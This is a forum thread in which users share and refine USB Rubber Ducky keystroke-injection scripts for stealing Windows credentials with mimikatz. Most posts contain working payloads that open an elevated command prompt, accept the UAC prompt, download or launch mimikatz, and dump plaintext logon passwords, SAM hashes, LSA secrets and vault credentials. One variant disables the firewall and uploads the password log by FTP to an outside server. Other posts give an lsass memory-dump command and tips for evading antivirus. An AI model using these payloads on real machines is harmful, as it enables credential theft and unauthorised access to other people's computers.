redmeatuk Posted June 14, 2013 Share Posted June 14, 2013 (edited) Hello all, This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes including the clear text passwords for wdigest from memory. http://blog.gentilkiwi.com/securite/mimikatz/minidump http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html Requirements -: - Webserver to host Mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit) you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture - Local user needs to be an administrator account/privs What does it do ? 1. It spawns a command shell with administrator privileges 2. It downloads mimikatz from a webserver using powershell 3. Using mimikatz to dump wdigest passwords from memory 4. Cleans up by deleting the binaries it downloaded It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite e.g. socat, ncat SSL, stunnel etc If you have a firmware installed that lets you store files you could copy the output to the SD card. Also mimikatz file could be encoded and run through powershell to generate the executable instead of 'wget'ing' the file. You may need to adjust timings in this script to play nice on your machine(s). Script -: REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe') DELAY 300 ENTER DELAY 3000 STRING %TEMP%\mimikatz.exe DELAY 300 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 1000 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTER Thanks for reading :) Aaron Edited June 29, 2013 by redmeatuk Quote Link to comment Share on other sites More sharing options...
rcancel76 Posted June 21, 2013 Share Posted June 21, 2013 Does this dump all pw's or just windows pw's? Quote Link to comment Share on other sites More sharing options...
redmeatuk Posted June 23, 2013 Author Share Posted June 23, 2013 (edited) AFAIK it dumps passwords for the currently logged in user. Mimikatz only works with Windows. Update - I see that you do not require SYSTEM privileges to get this to work, just need to launch cmd.exe with administrator privileges and then run mimikatz commands. I've amended the script. Edited June 23, 2013 by redmeatuk Quote Link to comment Share on other sites More sharing options...
shutin Posted June 30, 2013 Share Posted June 30, 2013 WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext! I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this: procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead? I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here. Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 30, 2013 Share Posted June 30, 2013 WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext! I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this: procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead? I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here. sounds promicing , looking forward to see it in action. Quote Link to comment Share on other sites More sharing options...
shutin Posted June 30, 2013 Share Posted June 30, 2013 Woo! Finally posting my own working payload! Thanks to overwraith and readmeatuk for their base code that I just tied together. This basically does exactly what readmeatuk's code does except you won't need an internet connection. Requirements: 1) Twin duck firmware or whatever it's called that lets you have a usb storage as well as firing inject.bin upon insertion. 2) mimikatz.exe (either 32bit or 64 bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory Notes: I tried to do it with procdump but it takes a LONG time to write out the 36meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky but it's still going to take awhile. I don't think that many AV programs are looking for mimikatz so it's fairly safe,. This script could be optimized a little, it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@ REM Author: shutin who just tied two other authors together: REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party REM Name: Runmimikatz.txt DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin and we need that for mimikatz CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part booyah CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY ACTUALLY RUN AN EXE STRING START %myd%\mimikatz.exe ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER DELAY 1000 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER Quote Link to comment Share on other sites More sharing options...
redmeatuk Posted July 1, 2013 Author Share Posted July 1, 2013 There was certainly room for improvement, nice work shutin ;) Quote Link to comment Share on other sites More sharing options...
redmeatuk Posted July 1, 2013 Author Share Posted July 1, 2013 Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1 This tool rocks! Quote Link to comment Share on other sites More sharing options...
shutin Posted July 5, 2013 Share Posted July 5, 2013 There was certainly room for improvement, nice work shutin ;) Thanks! Mimikatz is a weird tool. Is there anyway to get it out spit output into a text file? It's mostly in french so it's a bit hard to understand. There is also no "help".I really want to get my version to dump the output back to the ducky drive instead of just displaying the console window. Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1 This tool rocks! but will it work if the pasword is one of those cloud passwords? I had trouble trying to extract those because I think they are stored online. Quote Link to comment Share on other sites More sharing options...
redmeatuk Posted July 6, 2013 Author Share Posted July 6, 2013 (edited) I've not seen any switches or examples of how to get mimikatz to output to a file, there may be an equivalent of script/tee on Windows, this works but you will not see any output as standard error and output will be redirected to a textfile of your choosing e.g. -: mimikatz.exe > output.txt 2>&1 Then just issue your commands as normal and exit. Cloud passwords ? Not sure, give it time though I'm sure someone will figure it all out :) Edited July 6, 2013 by redmeatuk Quote Link to comment Share on other sites More sharing options...
redmeatuk Posted July 6, 2013 Author Share Posted July 6, 2013 I wasn't aware that mimikatz is now in meterpreter! meterpreter session needs to be running with SYSTEM privileges Once you have a meterpreter shell you can run the following commands -: load mimikatz wdigest Quote Link to comment Share on other sites More sharing options...
DyFukA Posted August 31, 2013 Share Posted August 31, 2013 (edited) Hello, for those of you that want a text file output on windows and ftp upload: DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 2000 CTRL-SHIFT ENTER DELAY 2000 STRING netsh firewall set opmode disable DELAY 500 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('https://mimikatz.exe,%TEMP%\mimikatz.exe') ENTER DELAY 4000 STRING cd %temp% DELAY 300 ENTER DELAY 500 STRING mimikatz.exe > pwlog.txt & type pwlog.txt DELAY 300 ENTER DELAY 1000 STRING privilege::debug DELAY 300 ENTER STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 500 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTER STRING move pwlog.txt c:\ ENTER DELAY 300 STRING ftp yoursite.com ENTER DELAY 1000 STRING youruser ENTER DELAY 1000 STRING yourpass ENTER DELAY 1000 STRING lcd c:\ ENTER DELAY 800 STRING put pwlog.txt ENTER DELAY 500 STRING quit ENTER DELAY 300 STRING del c:\pwlog.txt ENTER Edited August 31, 2013 by DyFukA Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted August 31, 2013 Share Posted August 31, 2013 Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk, REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING privilege::debug ENTER STRING sekurlsa::logonPasswords full ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 1, 2013 Share Posted September 1, 2013 lsass dump through powershell and pushed to remote server https://github.com/b00stfr3ak/ducky_lsass_dump just run mimikatz on the same type of system and you are golden. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 10, 2013 Share Posted September 10, 2013 Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly. REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
DyFukA Posted September 10, 2013 Share Posted September 10, 2013 Just flashed to twin duck firmware and ran it, works great! Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 11, 2013 Share Posted September 11, 2013 Comment from Youtube on the latest episode featuring the payload suggests OS / CPU detection. sendforththegunboats You could improve this further by detecting your OS architecture using the %processor_architecture% variable then running the specific command based on the output. The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz. Any takers? Quote Link to comment Share on other sites More sharing options...
mypyramorhinx Posted October 8, 2013 Share Posted October 8, 2013 (edited) So noob question here. I can't seem to get mimikatz to run after insertion. I have copied Darren's code from above, but for some reason it exits prior to executing the .exe file. I modified his a bit, maybe someone can look at this. REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x86 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 1000 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER I changed the %duck%mimikatz_alpha_x64.exe to just be mimikatz.exe That should work right? I copied the alpha/win32/mimikatz.exe over but it still doesn't seem to run. It seems simply skip over this and exit. Any ideas? Edited October 9, 2013 by mypyramorhinx Quote Link to comment Share on other sites More sharing options...
mypyramorhinx Posted October 11, 2013 Share Posted October 11, 2013 No one wants to help me out here? I can't seem to get this to work. The other problem that I have, well part of this problem, is that the mimikatz application is not named as it is listed here in the ducky code. It is simply named mimikatz.exe. I know to take the program from the right folder, but I seem to be at a stand still. Anyone out there that can help with this payload? Quote Link to comment Share on other sites More sharing options...
hzm74 Posted November 8, 2013 Share Posted November 8, 2013 Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly. REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER This gives me following error: mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found ! Module : privilege Full name : Privilege module debug - Ask debug privilege LOOK AT: ::logonPasswordssamdump I have missing spaces in my commandline. This line: STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt doesn't create spaces in the commandline between debug" "sekurlsa and full" "samdump PLEASE HELP. Seems simple?! Quote Link to comment Share on other sites More sharing options...
gentilkiwi Posted January 5, 2014 Share Posted January 5, 2014 If you cd %duck% before, you can use : mimikatz privilege::debug log sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit mimikatz privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit mimikatz privilege::debug sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit > filename.log Quote Link to comment Share on other sites More sharing options...
gentilkiwi Posted August 24, 2014 Share Posted August 24, 2014 Hi everybody After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex Enjoy my script, and let me know if any improvement needed (be nice, it's my first one ) DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb RunAs ENTER DELAY 1500 ALT o DELAY 250 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d ENTER DELAY 500 STRING cd /d %MIMIKEY%\ ENTER DELAY 500 STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit ENTER DELAY 500 STRING exit ENTER You only need at the root of the key: mimikatz_x86.exe mimikatz_amd64.exe mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection. Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 25, 2014 Share Posted August 25, 2014 Hi everybody After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex Enjoy my script, and let me know if any improvement needed (be nice, it's my first one ) DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb RunAs ENTER DELAY 1500 ALT o DELAY 250 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d ENTER DELAY 500 STRING cd /d %MIMIKEY%\ ENTER DELAY 500 STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit ENTER DELAY 500 STRING exit ENTER You only need at the root of the key: mimikatz_x86.exe mimikatz_amd64.exe mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection. Hello, thank you fore your script . but i have an issue (i am newbie..) on your script you are writing "ALT o" but i don't know what it mean, and it doesn't do anything on my computer. (france/belgium) so when the script is processing, it just writing "o" on the terminal can you help me ? thanks ! C:\Users\XXX>ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d 'ofor' is not recognized as an internal or external command, operable program or batch file. Quote Link to comment Share on other sites More sharing options...
gentilkiwi Posted August 25, 2014 Share Posted August 25, 2014 'ALT o' is to bypass UAC in French ;), replace it with 'y' for English If no UAC, you can remove it ;) Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 25, 2014 Share Posted August 25, 2014 'ALT o' is to bypass UAC in French ;), replace it with 'y' for English If no UAC, you can remove it ;) ooh, right, i have forgotten you are french.:) but, it s not working on my PC (french too) , so it is just written "o" on the cmd. so the next command line is broken -for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d become -ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d do you mean ALT GR "o" ? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.